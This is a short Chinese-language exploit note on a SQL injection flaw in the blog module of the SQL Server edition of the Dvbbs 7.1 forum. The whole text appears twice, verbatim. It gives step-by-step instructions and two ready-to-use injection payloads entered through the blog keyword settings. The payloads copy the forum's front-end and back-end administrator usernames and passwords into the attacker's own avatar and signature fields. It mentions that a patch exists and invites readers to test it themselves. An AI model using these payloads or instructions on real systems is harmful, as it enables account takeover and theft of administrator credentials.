对SQL版的动网7.1系统。开放了博客功能
登陆http://bbs.xxx.com/bokeindex.asp
点“博客管理” 登陆后在点 关键字设置
在“链接地址”处写上动网sql注入语句
例: 123123'where 1=0;update dv_user set userface=(select top 1 username from dv_user where userclass='管理员'),usersign=(select top 1 userpassword from dv_user where userclass='管理员') where username='四眼小新i'--
修改完成后进行提交。提交成功后转到动网论坛首页登陆自己的会员帐号,打开“用户控制面板”中的“基本资料修改”可以看到以上爆出的前台管理员帐号和密码已经显示在了自定义头像和签名处了
2、获得后台管理员用户名和口令,分别放在自定义头像和签名中,查看用户的基本资料即可看到。
123123'where 1=0;update dv_user set userface=(select top 1 username from dv_admin),usersign=(select top 1 password from dv_admin) where username='四眼小新'--
BCT已经在3月8号发布了安全补丁了。。。。
目前成功率不太高了。 请自行架设验证。
登陆http://bbs.xxx.com/bokeindex.asp
点“博客管理” 登陆后在点 关键字设置
在“链接地址”处写上动网sql注入语句
例: 123123'where 1=0;update dv_user set userface=(select top 1 username from dv_user where userclass='管理员'),usersign=(select top 1 userpassword from dv_user where userclass='管理员') where username='四眼小新i'--
修改完成后进行提交。提交成功后转到动网论坛首页登陆自己的会员帐号,打开“用户控制面板”中的“基本资料修改”可以看到以上爆出的前台管理员帐号和密码已经显示在了自定义头像和签名处了
2、获得后台管理员用户名和口令,分别放在自定义头像和签名中,查看用户的基本资料即可看到。
123123'where 1=0;update dv_user set userface=(select top 1 username from dv_admin),usersign=(select top 1 password from dv_admin) where username='四眼小新'--
BCT已经在3月8号发布了安全补丁了。。。。
目前成功率不太高了。 请自行架设验证。
